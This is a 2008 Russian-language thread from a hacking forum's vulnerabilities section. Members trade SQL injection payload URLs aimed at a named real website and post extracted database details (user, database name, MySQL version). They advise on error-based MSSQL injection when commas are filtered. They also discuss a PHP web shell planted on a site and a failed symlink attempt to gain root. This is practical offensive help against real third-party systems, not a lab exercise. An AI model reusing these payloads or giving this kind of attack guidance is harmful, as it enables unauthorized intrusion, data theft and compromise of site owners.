HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.07.2008, 23:00
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

кто нить ответит по поводу сообщения #2621, есть ли так уъязвимость иль нету, че я не так делаю
 
Ответить с цитированием

  #2  
Старый 14.07.2008, 01:02
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

маза в том что нужно чтобы админ перешёл по линку, когда он будет авторихован и чтобы у него всё сработало))
 
Ответить с цитированием

  #3  
Старый 14.07.2008, 06:00
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/*

Колонки подобраны не правильно,скоре всего


http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1


помогите аскрутить плиз...
 
Ответить с цитированием

  #4  
Старый 14.07.2008, 06:54
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию

Да просто версия Мускуля - 3-я, у нее нет UNION'a:
http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3
---
Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...
 
Ответить с цитированием

  #5  
Старый 14.07.2008, 09:33
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

хм и почему же ты так решил ? )
http://www.svetlana-russkaya.ru/index.php?pid=101
user=svetlana@localhost
database=svetlana
version=3.23.58
попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы

Последний раз редактировалось MaSTeR GэN; 14.07.2008 в 09:35..
 
Ответить с цитированием

Фильтрация запятых
  #6  
Старый 14.07.2008, 10:14
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию Фильтрация запятых

Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!

Последний раз редактировалось NamahS; 14.07.2008 в 10:30.. Причина: Корректировал
 
Ответить с цитированием

  #7  
Старый 16.07.2008, 06:38
NamahS
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756

Репутация: 1
По умолчанию

Цитата:
Сообщение от NamahS  
Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!
Я что в игноре?
ПОЖАЛУЙСТА!!!! ПОМОГИТЕ!!!!!!!!!!!
хотя бы в ПМ

Последний раз редактировалось NamahS; 16.07.2008 в 06:50..
 
Ответить с цитированием

  #8  
Старый 16.07.2008, 08:42
Светлый
Участник форума
Регистрация: 28.06.2007
Сообщений: 221
Провел на форуме:
836479

Репутация: 135
По умолчанию

Цитата:
Сообщение от NamahS  
Всем привет!
Есть вопросы по MSSQL.
Есть рабочая уязвимость, например:
/?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы.
В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar...
Все другие типы ( int,binary и т.д.) не возвращаются!!!
Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например :
/?part=items&id=1+OR+1=(select+top+1+cast(id+as+nva rchar)+from+sa_names)--
или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarch ar,id)+from+sa_names)--
...значения не возвращаются...
И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)...
Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary....
Заранее ОГРОМНОЕ СПАСИБО !!!

У тебя условие:
/?part=npcs&id=1+OR+1=(select+db_name(1))

ошибка генерится в части OR 1=(~запрос~)
при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).

Последний раз редактировалось Светлый; 16.07.2008 в 08:56..
 
Ответить с цитированием

  #9  
Старый 14.07.2008, 13:43
Xster
Новичок
Регистрация: 08.07.2008
Сообщений: 2
Провел на форуме:
14347

Репутация: 0
По умолчанию

Помогите, пожалуйста, разобраться с правами шелла.

Суть проблемы:

Залил PHPшелл на сайт - права user/user.
Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение.
Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер.
В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user.

Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.
 
Ответить с цитированием

  #10  
Старый 14.07.2008, 16:23
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Xster  
Нифига не пойму. Почему он НЕ работает на правах root?
Спасибо.
Потому что в данном случае пхп запускается с правами апача, а не с правами владельца скрипта.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 14.07.2008 в 23:56..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ